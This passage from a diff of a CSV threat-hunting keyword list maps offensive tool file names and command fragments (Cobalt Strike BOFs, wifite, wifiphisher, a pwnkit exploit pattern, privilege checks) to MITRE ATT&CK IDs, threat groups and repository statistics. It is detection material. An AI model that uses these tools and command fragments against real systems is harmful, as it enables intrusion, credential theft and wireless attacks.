- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","152","27","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" @@ -18206,75 +18392,77 @@ "*WheresMyImplant.git*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*WheresMyImplant.sln*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*while * do mv *GCONV_PATH=./value* done","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/Ayrx/CVE-2021-4034 ","1","0","N/A","N/A","1","97","16","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z" -"*Whirlpool-Orig-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Whirlpool-Tweak-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*Whisker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*Whirlpool-Orig-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whirlpool-Tweak-512.verified.test-vectors.txt*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*Whisker.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*whiskeysaml.py*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*whiskeysamlandfriends*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" -"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*whoami /priv | findstr /i /C:*SeImpersonatePrivilege*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*whoami /user*","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" -"*whoami.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*whoami.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*WhoamiGetTokenInfo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*wifi/airpwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*wifi/dnspwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*whoami.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*whoami.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*WhoamiGetTokenInfo*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*wifi/airpwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi/dnspwn*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wifi_dos_own.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*wifi_dos3.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" "*wifi_dump_linux*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*wifi_fake_auth.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*wifi_fake_auth.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*WiFi_Hacker.ino*","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1025 T1052","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","2","132","64","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z" -"*wifi_pineapple_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*wifi_recon_handshakes*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*wifi-arsenal*","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1690","401","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" +"*wifi_pineapple_csrf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*wifi_recon_handshakes*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*wifi-arsenal*","offensive_tool_keyword","wifi-arsenal","github repo with all the wireless exploitation tools available","N/A","N/A","N/A","N/A","Network Exploitation tools","https://github.com/0x90/wifi-arsenal","1","1","N/A","N/A","10","1692","401","2020-07-06T00:46:06Z","2015-03-22T18:38:03Z" "*wifibroot.py*","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","N/A","9","866","180","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z" -"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1094","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" -"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1094","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" -"*wifidump.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3750","797","2023-07-04T01:43:51Z","2014-01-26T07:54:39Z" -"*wifiphisher*","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12107","2517","2023-09-26T19:58:05Z","2014-09-26T12:47:28Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurify","Android application to brute force WiFi passwords without requiring a rooted device.","T1110 - T1555 - T1051 - T1081","TA0002 - TA0008 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifi-bruteforcer*","offensive_tool_keyword","wifi-bruteforcer-fsecurity","Wifi bruteforcer","T1110 - T1114 - T1601 - T1602 - T1603","TA0003 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/faizann24/wifi-bruteforcer-fsecurify","1","1","N/A","N/A","10","1097","328","2022-04-16T02:59:36Z","2017-01-02T17:54:33Z" +"*wifidump.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*wifijammer*","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1531","TA0001 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/DanMcInerney/wifijammer","1","1","N/A","N/A","10","3751","797","2023-07-04T01:43:51Z","2014-01-26T07:54:39Z" +"*wifiphisher*","offensive_tool_keyword","wifiphisher","The Rogue Access Point Framework.","T1553.003 - T1562 - T1539","TA0002 - TA0007 - ","N/A","N/A","Frameworks","https://github.com/wifiphisher/wifiphisher","1","1","N/A","N/A","10","12111","2518","2023-09-26T19:58:05Z","2014-09-26T12:47:28Z" "*WiFi-Pumpkin*","offensive_tool_keyword","WiFi-Pumpkin","Framework for Rogue Wi-Fi Access Point Attack.","T1562 - T1530 - T1552 - T1553 - T1561","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/P0cL4bs/WiFi-Pumpkin","1","1","N/A","N/A","10","3059","750","2020-04-18T19:32:52Z","2015-06-27T00:56:21Z" -"*wifite --crack*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --crack*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" "*wifite --dict *.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wifite -e *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite -e *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" "*wifite --kill*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*wifite --wep *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*Wifite.py*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" -"*wifite2.git*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","1","N/A","N/A","10","5332","1188","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*wifite --wep *","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation tools","https://github.com/derv82/wifite2","1","0","N/A","N/A","10","5335","1189","2023-09-21T16:40:07Z","2015-05-30T06:09:52Z" +"*Wifite.py*","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Network Exploitation 